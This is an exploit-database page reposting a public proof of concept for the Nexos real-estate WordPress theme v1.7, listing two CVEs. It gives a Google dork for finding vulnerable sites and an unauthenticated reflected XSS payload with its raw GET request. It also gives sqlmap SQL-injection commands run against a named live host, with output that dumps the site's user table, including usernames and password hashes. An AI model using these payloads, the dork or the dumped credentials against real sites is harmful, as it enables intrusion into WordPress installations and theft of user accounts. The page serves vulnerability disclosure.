Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-15363 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-06-29 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.03569 | 0.76323 |
[+] Exploit Title: Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/nexos/ [+] Date: 2020-06-17 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] [+] Software Version: 1.7 [+] Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 [+] Tested on: Debian 10 [+] CVE: CVE-2020-15363, CVE-2020-15364 [+] CWE: CWE-79, CWE-89 ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] https://listing-themes.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLDVCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /nexos-wp/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: geniuscr_nexos Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+ | user_login | user_pass | user_email | +--------------+------------------------------------+-------------------------+ | user | $P$B0eez6Fan0emMx31I/k5F.uza48xWy. | [email protected] | | admin | $P$B0k0ctLBFFLhNs.T8hH6LYKoTBcb2R/ | [email protected] | | ketysprings | $P$BdVhMq2W0.buAwSgzcUVG5rvEKwuYm/ | [email protected] | | amt_listing | $P$BFlTaGkDr2Ah1HLbDqGG7qC4DPU74A/ | [email protected] | | agent | $P$Blz1idk4HqnH69A373ZGq1R27LEoFm1 | [email protected] | | wodo_listing | $P$BnpfrXvakrRL.SevusOcHg2QBpzAYZ0 | [email protected] | | tonystark | $P$BpnHKXT/haUdZSaJ.Bw9LYwqL2KIUS0 | [email protected] | | alenwinter | $P$BVvVELeLL0BQoGmksEuHziez.uJN49. | [email protected] | | ezf_listing | $P$BZC7jVDUafAaF.aQb.GQ05TQcfuRzE. | [email protected] | +--------------+------------------------------------+-------------------------+ ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.